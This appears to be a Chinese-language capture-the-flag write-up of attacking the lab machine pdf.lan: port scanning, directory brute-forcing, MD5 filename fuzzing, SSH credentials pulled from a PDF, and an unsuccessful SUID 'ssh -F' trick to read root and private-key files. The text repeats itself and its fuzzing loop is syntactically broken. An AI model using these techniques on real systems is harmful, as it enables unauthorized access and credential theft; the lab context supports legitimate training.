本文记录了对靶机 pdf.lan 的渗透测试过程。首先通过分析80端口页面源码并配合目录扫描,成功找到 hint.txt 获取关键凭据 42,从而登录8080端口的文件管理系统 。随后,利用脚本生成1-100的MD5哈希字典对该系统进行Fuzzing,找出一个特殊的PDF文件,通过 strings 命令提取出 SSH 登录凭据 welcome:lamar57。在提权阶段,发现 /usr/bin/ssh 具有 SUID 权限,尝试利用 ssh -F 读取任意文件,但由于报错输出会将内容转为小写,导致无法成功利用提取到的私钥提权 。 本文记录了对靶机 pdf.lan 的渗透测试过程。首先通过分析80端口页面源码并配合目录扫描,成功找到 hint.txt 获取关键凭据 42,从而登录8080端口的文件管理系统 。随后,利用脚本生成1-100的MD5哈希字典对该系统进行Fuzzing,找出一个特殊的PDF文件,通过 strings 命令提取出 SSH 登录凭据 welcome:lamar57。在提权阶段,发现 /usr/bin/ssh 具有 SUID 权限,尝试利用 ssh -F 读取任意文件,但由于报错输出会将内容转为小写,导致无法成功利用提取到的私钥提权 。
信息收集
# Nmap 7.95 scan initiated Tue Dec 16 11:56:36 2025 as: /usr/lib/nmap/nmap --privileged -Pn -p22,80,8080 -sC -sV -oA ./Recon/192.168.110.57 192.168.110.57
Nmap scan report for pdf.lan (192.168.110.57)
Host is up (0.00076s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: The Evolution of PDF Format
8080/tcp open http Golang net/http server
|_http-title: File Management System
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Date: Tue, 16 Dec 2025 11:56:49 GMT
| Content-Length: 1415
| Content-Type: text/html; charset=utf-8
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <title>File Management System</title>
| <style>
| body { font-family: Arial, sans-serif; margin: 40px; background-color: #f4f4f4; }
| .container { max-width: 800px; margin: auto; padding: 20px; background: white; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
| text-align: center; color: #333; }
| .error { color: red; text-align: center; }
| .hint { color: #555; text-align: center; font-style: italic; }
| input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ccc; border-radius: 4px; }
| button { width: 100%; padding: 10px; background: #007bff; color: white; border: none; border-radius: 4px; cursor: pointer; }
|_ button
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :漏洞分析
http://192.168.110.57/ // 查看源代码找到338行<!-- hint: .txt -->
➜ Pdf gobuster dir -u <http://192.168.110.57/> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: <http://192.168.110.57/>
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/hint.txt (Status: 200) [Size: 44]
/server-status (Status: 403) [Size: 279]
Progress: 441116 / 441116 (100.00%)
===============================================================
Finished
===============================================================
➜ curl http://192.168.110.57/hint.txt ➜number 42
➜ http://192.168.110.57:8080/ // 输入42即可进入发现搜索文件名字是1的MD5值,所以我们创建1-100的MD5.pdf
for i in {1...100}:do
hash=$(echo -n "$i" | md5sum | awk '{print $1}')
echo -n "{hash}.pdf" >> payload.txt
doneffuf -u http://192.168.110.57:8080/view/\?filename\=FUZZ -w payload_list.txt -b "session_token=42" -fs 1779,1193
# 发现72b32a1f754ba1c09b3695e0cb6cde7f.pdf [Status: 200, Size: 1219, Words: 108, Lines: 81, Duration: 9ms]利用
将不寻常的pdf文件保存在本地
strings id_57.pdf得到welcome:lamar57
权限提升
welcome@pdf:~$ find / -perm -4000 2>/dev/null
/usr/bin/sshLFILE=/root/root.txt
ssh -F $LFILE localhost
# 不能读取/root/.ssh/id.rsa 因为读取出来的全是小写字母
# 找不到提权路径了经验教训
对72b32a1f754ba1c09b3695e0cb6cde7f.pdf 不坚定
This post has not been translated to English yet.
信息收集
# Nmap 7.95 scan initiated Tue Dec 16 11:56:36 2025 as: /usr/lib/nmap/nmap --privileged -Pn -p22,80,8080 -sC -sV -oA ./Recon/192.168.110.57 192.168.110.57
Nmap scan report for pdf.lan (192.168.110.57)
Host is up (0.00076s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: The Evolution of PDF Format
8080/tcp open http Golang net/http server
|_http-title: File Management System
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Date: Tue, 16 Dec 2025 11:56:49 GMT
| Content-Length: 1415
| Content-Type: text/html; charset=utf-8
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <title>File Management System</title>
| <style>
| body { font-family: Arial, sans-serif; margin: 40px; background-color: #f4f4f4; }
| .container { max-width: 800px; margin: auto; padding: 20px; background: white; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
| text-align: center; color: #333; }
| .error { color: red; text-align: center; }
| .hint { color: #555; text-align: center; font-style: italic; }
| input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ccc; border-radius: 4px; }
| button { width: 100%; padding: 10px; background: #007bff; color: white; border: none; border-radius: 4px; cursor: pointer; }
|_ button
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :漏洞分析
http://192.168.110.57/ // 查看源代码找到338行<!-- hint: .txt -->
➜ Pdf gobuster dir -u <http://192.168.110.57/> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: <http://192.168.110.57/>
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/hint.txt (Status: 200) [Size: 44]
/server-status (Status: 403) [Size: 279]
Progress: 441116 / 441116 (100.00%)
===============================================================
Finished
===============================================================
➜ curl http://192.168.110.57/hint.txt ➜number 42
➜ http://192.168.110.57:8080/ // 输入42即可进入发现搜索文件名字是1的MD5值,所以我们创建1-100的MD5.pdf
for i in {1...100}:do
hash=$(echo -n "$i" | md5sum | awk '{print $1}')
echo -n "{hash}.pdf" >> payload.txt
doneffuf -u http://192.168.110.57:8080/view/\?filename\=FUZZ -w payload_list.txt -b "session_token=42" -fs 1779,1193
# 发现72b32a1f754ba1c09b3695e0cb6cde7f.pdf [Status: 200, Size: 1219, Words: 108, Lines: 81, Duration: 9ms]利用
将不寻常的pdf文件保存在本地
strings id_57.pdf得到welcome:lamar57
权限提升
welcome@pdf:~$ find / -perm -4000 2>/dev/null
/usr/bin/sshLFILE=/root/root.txt
ssh -F $LFILE localhost
# 不能读取/root/.ssh/id.rsa 因为读取出来的全是小写字母
# 找不到提权路径了经验教训
对72b32a1f754ba1c09b3695e0cb6cde7f.pdf 不坚定